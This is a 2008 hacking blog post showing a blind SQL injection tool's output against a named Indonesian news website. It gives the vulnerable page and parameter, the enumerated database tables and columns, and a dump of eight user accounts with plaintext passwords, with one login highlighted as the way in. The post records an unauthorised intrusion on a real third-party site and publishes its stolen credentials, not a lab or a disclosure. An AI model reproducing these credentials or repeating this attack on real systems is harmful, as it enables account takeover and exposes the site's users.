viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Wednesday, October 15, 2008

[SQLi] http://www.buturnews.idrap.or.id

3:14 PM Posted by viperfx07 No comments


Tool --> blindext.py v5.0
User login --> buturnews:banda1302 (see else in dump)
Dump:
[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "t79166_dbbutur"
[+] 10:12:30
[+] Number of Rows: 5

[0]: tberita
[1]: tcounter
[2]: topini
[3]: ttamu
[4]: tuser

[-] 10:24:56
[-] Total URL Requests 292
[-] Done


[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "t79166_dbbutur" and Table "tuser"
[+] 10:25:33
[+] Number of Rows: 16

[0]: IDUSER
[1]: JENIS_KEL
[2]: JABATAN
[3]: USERNAME
[4]: PASSWORD
[5]: NAMA_DEPAN
[6]: NAMA_AKHIR
[7]: AGAMA
---------- cut here because it's too boring -----

[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "t79166_dbbutur" Table "tuser"
[+] Column(s) ['username', 'password']
[+] 10:47:55
[+] Number of Rows: 8

[0]: harmin70:hh070729
[1]: bob:kana10
[2]: syair79:as080218
[3]: buturnews:banda1302
[4]: husain78:hs070725
[5]: hamzah75:hz080224
[6]: arif82:ar080401
[7]: tasrun87:tm080410

[-] 10:56:34
[-] Total URL Requests 975
[-] Done

0 comments:

Post a Comment